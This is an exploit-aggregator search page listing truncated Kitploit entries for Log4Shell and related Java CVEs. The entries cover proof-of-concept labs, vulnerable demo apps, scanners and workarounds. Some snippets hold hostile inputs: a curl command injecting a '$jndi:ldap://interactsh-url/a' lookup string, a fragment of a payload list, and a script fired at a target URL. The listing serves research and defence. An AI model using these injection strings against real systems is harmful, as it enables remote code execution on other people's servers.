Lucene search
+L

164 matches found

Kitploit
Kitploit
added 2026/09/10 5:24 a.m.10 views

Log4j2-CVE-2021-44228

CVE-2021-44228 Remote Code Injection In Log4j https://twitter.com/jas502n/status/1468946197629272066 SpringBoot-pom.xml default use : xml org.springframework.boot spring-boot-starter-web root@kitploit: mvn dependency:treejava INFO | | +-...

10CVSS7.5AI score0.99999EPSS
SaveExploits368
Kitploit
Kitploit
added 2026/09/10 2:52 a.m.6 views

hka-seminar-log4shell

Seminar Paper - Log4Shell Vulnerability Demonstration CVE-2021-44228 Security Notice This repository is intended exclusively for educational and demonstration purposes as part of a security-related seminar paper. Do not use this code in production environments or against systems without explicit...

10CVSS7.3AI score0.99999EPSS
SaveExploits368
Kitploit
Kitploit
added 2026/09/10 2:42 a.m.7 views

log4shell-demo

Simple Spring Boot application which is vulnerable to Log4Shell CVE-2021-44228 Changed default logging framework from logback to log4j2 Application logs 'User-Agent' header, so one can test vulnerability with curl and e.g. interactsh-service: root@kitploit: curl -A '$jndi:ldap://interactsh-url/a'...

10CVSS7.5AI score0.99999EPSS
SaveExploits368References1
Kitploit
Kitploit
added 2026/09/10 1:15 a.m.6 views

log4j-cve-2021-44228-sample

Example of log4j exploit This repo has a working sample of abusing the recent log4j exploit. It does not perform actual remote code execution, but shows you the ease at which a bad actor can have a vulnerable application call out to its own ldap server. This uses the excellent log4j sample...

10CVSS7.5AI score0.99999EPSS
SaveExploits368References1
Kitploit
Kitploit
added 2026/09/10 12:52 a.m.8 views

vulescanjndilookup

vulescanjndilookup AUTOMATED TOOL FOR DETECTING VULNERABILITY CVE-2021-44228 Requirements: Python v. 3 Installation: git clone https://github.com/MiguelM001/vulescanjndilookup.git Execution: python3 vulescanjndilookup.py -h python3 vulescanjndilookup.py -d / python3 vulescanjndilookup.py -d...

10CVSS7.4AI score0.99999EPSS
SaveExploits368References1
Kitploit
Kitploit
added 2026/09/09 11:35 p.m.10 views

CVE-2021-44228-Apache-Log4j-Rce

CVE-2021-44228 Ejecución Remota de Código en Apache Log4j todas las versiones de log4j-core =2.0-beta9 y No confíe en una versión actual de Java para salvarse. Actualice Log4 o elimine la búsqueda JNDI. Deshabilite la expansión de todos modos parece una muy mala idea...

10CVSS7.4AI score0.99999EPSS
SaveExploits368References1
Kitploit
Kitploit
added 2026/09/09 11:00 p.m.9 views

Get-log4j-Windows-local

Get-log4j-Windows-local.ps1 Identify all log4j components on a single local windows servers. CVE-2021-44228. A single use copy - see https://github.com/KeysAU/Get-log4j-Windows.ps1 for multi computer. Apache log4j CVE-2021-44228 Script Running: Export: Columns A - I: Continued: Description:...

10CVSS7.4AI score0.99999EPSS
SaveExploits368References1
Kitploit
Kitploit
added 2026/09/09 10:40 p.m.9 views

EXPLOIT-CVE-2021-44228

CVE-2021-44228 — Log4Shell PoC Lab DISCLAIMER This lab was created exclusively for educational and security research purposes. All traffic occurs within an isolated Docker network. Do not use this material on real systems or without explicit authorization. Misuse may be a crime. Use responsibly...

10CVSS7.5AI score0.99999EPSS
SaveExploits368
Kitploit
Kitploit
added 2026/09/09 8:58 p.m.5 views

CVE-2021-45046

tejas-nagchandi/CVE-2021-45046 Attack Description It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map MDC input data when the logging configuration uses a...

9CVSS7.2AI score0.99977EPSS
SaveExploits40
Kitploit
Kitploit
added 2026/09/09 8:20 p.m.6 views

log4j-CVE-2021-44228-workaround

log4j-CVE-2021-44228-workaround A. Descripción de la solución Este proyecto proporciona una solución alternativa de propósito general para la vulnerabilidad log4j CVE-2021-44228, que se puede usar en caso de que no tengas la alternativa a corto plazo de reconstruir tu proyecto respectivo o parche...

10CVSS7.4AI score0.99999EPSS
SaveExploits368
Kitploit
Kitploit
added 2026/09/09 7:58 p.m.6 views

log4j-docker-vaccine

Log4j Docker Vaccine A containerized way to run the log4j vaccine offered by Cyberreason https://github.com/Cybereason/Logout4Shell Make it go Clone this repo: root@kitploit: git clone https://github.com/jeffbryner/log4j-docker-vaccine.git Edit the containers.env file to hold an accurate private ...

5.8AI score
SaveExploits0References2
Kitploit
Kitploit
added 2026/09/09 7:38 p.m.9 views

CVE-2021-44228

CVE-2021-44228 Vulnerability recurrence 1. Run RmiServer first to create an RMI registry service. 2. Run Log4jTest, if you use Windows, the calculator will appear...

10CVSS7.4AI score0.99999EPSS
SaveExploits368
Kitploit
Kitploit
added 2026/09/09 5:26 p.m.6 views

CVE-2023-21839

CVE-2023-21839 Analysis This vulnerability is caused by triggering the getReferent method of the bound object when calling the lookup or list method after binding an object via the t3 or iiop protocol. Call stack for t3 protocol: root@kitploit: getObjectInstance:96, WLNamingManager...

7.5CVSS7.8AI score0.999EPSS
SaveExploits12
Kitploit
Kitploit
added 2026/09/09 4:32 p.m.4 views

cve-2022-42889-text4shell-docker

Instalar maven - maven-linux 1. Instalación de Maven para crear el fat jar root@kitploit: mvn clean install 2. Construir Docker root@kitploit: docker build --tag=text4shell . 3. Ejecutar Docker root@kitploit: docker run -p 80:8080 text4shell 4. Probar la aplicación root@kitploit:...

9.8CVSS7.4AI score0.99931EPSS
SaveExploits42
Kitploit
Kitploit
added 2026/09/09 11:44 a.m.11 views

CVE-2021-44228-Apache-Log4j-Rce

CVE-2021-44228Apache Log4j Remote Code Execution) all log4j-core versions =2.0-beta9 and =2.14.1 The version of 1.x have other vulnerabilities, we recommend that you update the latest version. Security Advisories / Bulletins linked to Log4Shell CVE-2021-44228 Usage: download this project, compile...

10CVSS7.4AI score0.99999EPSS
SaveExploits368References3
Kitploit
Kitploit
added 2026/09/09 11:40 a.m.5 views

log4jcheck

Northwave Log4j CVE-2021-44228 checker Friday 10 December 2021 a new Proof-of-Concept 1 addressing a Remote code Execution RCE vulnerability in the Java library 'log4j' 2 was published. This vulnerability has not been disclosed to the developers of the software upfront. The vulnerability is being...

10CVSS7.5AI score0.99999EPSS
SaveExploits368References1
Kitploit
Kitploit
added 2026/09/09 11:35 a.m.6 views

Log4j_CVE-2021-44228

The Log4j vulnerability, also known as "Log4Shell" or "CVE-2021-44228," is a critical security flaw in the Apache Log4j library. Log4j is a widely used Java-based logging framework that allows developers to log messages from applications to various destinations, such as files, databases, and...

10CVSS7.2AI score0.99999EPSS
SaveExploits368References1
Kitploit
Kitploit
added 2026/09/09 11:07 a.m.5 views

Log4j-RCE

Log4j-RCE Log4j RCE - CVE-2021-44228 How To Run? root@kitploit: php log4j.php https://1337.com Requirements PHP CURL PAYLOAD DNS LOG Collaborator Burpsuite or use dnslog.cn List Payload root@kitploit: $ctx:loginId $map:type $filename $date:MM-dd-yyyy $docker:containerId $docker:containerName...

10CVSS7.5AI score0.99999EPSS
SaveExploits368
Kitploit
Kitploit
added 2026/09/09 10:58 a.m.5 views

CVE-2021-44228-Apache-Log4j-Rce-main

CVE-2021-44228Apache Log4j Remote Code Execution) all log4j-core versions =2.0-beta9 and =2.14.1 The version of 1.x have other vulnerabilities, we recommend that you update the latest version. Security Advisories / Bulletins linked to Log4Shell CVE-2021-44228 Usage: download this project, compile...

10CVSS7.4AI score0.99999EPSS
SaveExploits368References3
Kitploit
Kitploit
added 2026/09/09 10:57 a.m.5 views

Log4jTools

Log4jTools Tools for investigating Log4j CVE-2021-44228 Bug explanation and Demo https://www.youtube.com/watch?v=0-abhd-CLwQ FetchPayload.py Get java payload from ldap path provided in JNDI lookup. Requirements: curl system, requests python Example command: root@kitploit: python FetchPayload.py...

10CVSS7.4AI score0.99999EPSS
SaveExploits368
Rows per page
Query Builder